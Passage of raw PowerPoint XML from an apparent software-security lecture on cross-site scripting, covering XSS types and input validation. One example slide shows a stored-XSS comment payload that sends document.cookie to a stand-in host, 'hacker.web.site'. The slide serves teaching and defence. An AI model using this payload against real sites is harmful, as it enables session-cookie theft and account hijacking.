              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF6633"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>Reflected XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333332"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>, where the malicious script comes from the current HTTP request.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF6633"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>Stored XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333332"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>, where the malicious script comes from the website's database.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF6633"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>DOM-based XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333332"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>, where the vulnerability exists in client-side code rather than server-side code.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" b="0" i="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="333332"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3853396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431540" y="1006855"/>
            <a:ext cx="3195955" cy="574040"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="12700" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="12700">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="100"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr spc="-5" dirty="0"/>
              <a:t>Software</a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-15" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-5" dirty="0"/>
              <a:t>Security</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="object 5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="993139" y="2077465"/>
            <a:ext cx="7613015" cy="3433445"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="12700" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="355600" marR="1506220" indent="-342900">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="100"/>
              </a:spcBef>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
              <a:tabLst>
                <a:tab pos="354965" algn="l"/>
                <a:tab pos="355600" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>Many vulnerabilities result from</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" spc="-85" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>poor  programming</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" spc="-5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>practices</a:t>
            </a:r>
            <a:endParaRPr sz="3000">
              <a:latin typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="755650" marR="662305" lvl="1" indent="-285750">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="680"/>
              </a:spcBef>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
              <a:tabLst>
                <a:tab pos="755015" algn="l"/>
                <a:tab pos="755650" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="2800" i="1" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>cf. </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" spc="-5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>Open </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" spc="-75" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>Web </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>Application </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" spc="-5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>Security </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" spc="-70" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>Top</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" spc="-370" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" spc="-70" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>Ten  </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>include 5 </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" spc="-5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>software </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>related</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" spc="-80" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" spc="-5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>flaws</a:t>
            </a:r>
            <a:endParaRPr sz="2800">
              <a:latin typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="355600" marR="5080" indent="-342900">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="710"/>
              </a:spcBef>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
              <a:tabLst>
                <a:tab pos="354965" algn="l"/>
                <a:tab pos="355600" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>Often from </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" spc="-5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>insufficient </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>checking / validation of  program</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" spc="-5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>input</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spc="-35" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>Awareness </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>of issues is</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" spc="5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>critical</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926576" y="6888788"/>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2</a:t>
            </a:fld>
            <a:endParaRPr sz="1400">
              <a:latin typeface="Arial"/>
              <a:cs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01138" y="1006855"/>
            <a:ext cx="6566662" cy="566822"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="12700" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="12700">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="100"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr spc="-5" dirty="0"/>
              <a:t>Cross Site Scripting</a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-75" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" spc="-75" dirty="0" smtClean="0"/>
              <a:t>(XSS) </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-5" dirty="0" smtClean="0"/>
              <a:t>Attacks</a:t>
            </a:r>
            <a:endParaRPr spc="-5" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="object 6"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9145016" y="6731760"/>
            <a:ext cx="22352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15</a:t>
            </a:r>
            <a:endParaRPr sz="1400">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="object 7"/>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5" name="Rectangle 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="533400" y="1981200"/>
            <a:ext cx="9067800" cy="1107996"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" smtClean="0"/>
              <a:t>XSS – manipulate a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0"/>
              <a:t>vulnerable web site so that it returns malicious JavaScript to users. When the malicious code executes inside a victim's browser, the attacker can fully compromise their interaction with the application.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9" name="Picture 8"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1180845" y="3399249"/>
            <a:ext cx="7696200" cy="3137726"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Rectangle 9"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="533400" y="6481704"/>
            <a:ext cx="7620000" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https://portswigger.net/web-security/cross-site-scripting</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="697368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816350" y="1006855"/>
            <a:ext cx="2426335" cy="574040"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="12700" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="12700">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="100"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-65" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>Example</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="object 5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="993139" y="1833625"/>
            <a:ext cx="7361555" cy="3244215"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="104139" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="355600" indent="-342900">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="819"/>
              </a:spcBef>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
              <a:tabLst>
                <a:tab pos="354965" algn="l"/>
                <a:tab pos="355600" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="3000" spc="-5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>Also </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>possible in guest books, </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" spc="-5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>wikis, </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>blogs</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" spc="-85" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>etc</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Where comment includes script code</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i="1" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>e.g. </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>to collect </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" spc="-5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>cookie details of viewing</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" spc="-125" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" spc="-5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>users</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spc="-5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>Need </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>to validate data</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" spc="25" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>supplied</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including </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" spc="-5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>handling various possible</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" spc="-125" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>encodings</a:t>
            </a:r>
            <a:endParaRPr sz="2800">
              <a:latin typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="355600" indent="-342900">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="715"/>
              </a:spcBef>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
              <a:tabLst>
                <a:tab pos="354965" algn="l"/>
                <a:tab pos="355600" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>Attacks both input and output</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" spc="-35" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>handling</a:t>
            </a:r>
            <a:endParaRPr sz="3000">
              <a:latin typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="object 6"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="927735" y="5521071"/>
            <a:ext cx="8126730" cy="768985"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="9ACCFF"/>
          </a:solidFill>
          <a:ln w="17526">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="59055" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="105410">
              <a:lnSpc>
                <a:spcPts val="1655"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="465"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="1400" spc="5" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>Thanks for </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>this </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" spc="5" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>information, its</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" spc="100" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" spc="10" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>great!</a:t>
            </a:r>
            <a:endParaRPr sz="1400">
              <a:latin typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="105410" marR="1200150">
              <a:lnSpc>
                <a:spcPts val="1590"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="105"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="1400" spc="5" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>&lt;script&gt;document.location='</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" spc="5" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>http://hacker.web.site/cookie.cgi?'+ </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" spc="5" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" spc="10" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>document.cookie&lt;/script&gt;</a:t>
            </a:r>
            <a:endParaRPr sz="1400">
              <a:latin typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="object 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="643890" y="5644134"/>
            <a:ext cx="40640" cy="38100"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="40640" h="38100">
                <a:moveTo>
                  <a:pt x="40386" y="19050"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="38909" y="11894"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="34861" y="5810"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="28813" y="1583"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="21335" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="19049" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11572" y="1583"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5524" y="5810"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1476" y="11894"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="19050"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1476" y="26527"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5524" y="32575"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11572" y="36623"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="19050" y="38100"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="21336" y="38100"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="28813" y="36623"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="34861" y="32575"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="38909" y="26527"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="40386" y="19050"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="FF0000"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="object 8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="643890" y="5644134"/>
            <a:ext cx="40640" cy="38100"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="40640" h="38100">
                <a:moveTo>
                  <a:pt x="40386" y="19050"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="38909" y="11894"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="34861" y="5810"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="28813" y="1583"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="21335" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="19049" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11572" y="1583"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5524" y="5810"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1476" y="11894"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="19050"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1476" y="26527"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5524" y="32575"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11572" y="36623"/>
                </a:lnTo>
                <a:lnTo>
